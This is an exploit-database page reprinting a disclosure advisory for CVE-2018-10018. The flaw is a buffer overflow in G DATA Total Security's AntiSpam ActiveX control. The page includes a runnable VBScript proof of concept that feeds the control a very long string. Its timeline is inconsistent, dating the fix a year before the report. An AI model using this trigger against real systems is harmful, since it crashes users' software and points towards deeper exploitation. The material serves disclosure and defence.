Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtFilipe Xavier Oliveira1337DAY-ID-30715
HistoryJul 13, 2018 - 12:00 a.m.

G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Exploit

2018-07-1300:00:00
Filipe Xavier Oliveira
0day.today
28

0.011 Low

EPSS

Percentile

84.4%

JSON

Exploit for windows platform in category dos / poc

<!--
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
 
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil
 
=====[ Table of Contents]=====================================================
 
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
 
=====[ Overview]==============================================================
 
* System affected : G DATA TOTAL SECURITY [1].
* Software Version : 25.4.0.3 (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,
 
=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.
 
A poc that causes a buffer overflow :
-->
 
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>
 
 
'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1
 
arg1=String(14356, "A")
 
target.IsBlackListed arg1
 
</script></job></package>
 
<!--
=====[ Timeline of disclosure]===============================================
 
04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.
 
07/12/2018 - CVE assigned [1]
 
=====[ Thanks & Acknowledgements]============================================
 
- Tempest Security Intelligence / Tempest's Pentest Team [3]
 
=====[ References]===========================================================
 
[1] https://www.gdatasoftware.com/
 
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
 
[3] http://www.tempest.com.br 
 
=====[ EOF]====================================================================
-->

#  0day.today [2018-07-13]  #

Related

exploitpack 1
cvelist 1
packetstorm 1
cve 1
prion 1
nvd 1
exploitdb 1
zdt 1
exploitpack
exploitpack
G DATA Total Security 25.4.0.3 - Activex Buffer Overflow
2018-07-13 00:00:00
cvelist
cvelist
CVE-2018-10018
2018-07-13 17:00:00
packetstorm
packetstorm
G DATA TOTAL SECURITY 25.4.0.3 Active-X Buffer Overflow
2018-07-13 00:00:00
cve
cve
CVE-2018-10018
2018-07-13 17:29:00
prion
prion
Buffer overflow
2018-07-13 17:29:00
nvd
nvd
CVE-2018-10018
2018-07-13 17:29:00
exploitdb
exploitdb
G DATA Total Security 25.4.0.3 - Activex Buffer Overflow
2018-07-13 00:00:00
zdt
zdt
ISS For Business 14.0.1400.2029 Blue Screen Of Death Vulnerability
2018-07-13 00:00:00

0.011 Low

EPSS

Percentile

84.4%

JSON
Related for 1337DAY-ID-30715
exploitpack1cvelist1packetstorm1cve1prion1nvd1exploitdb1zdt1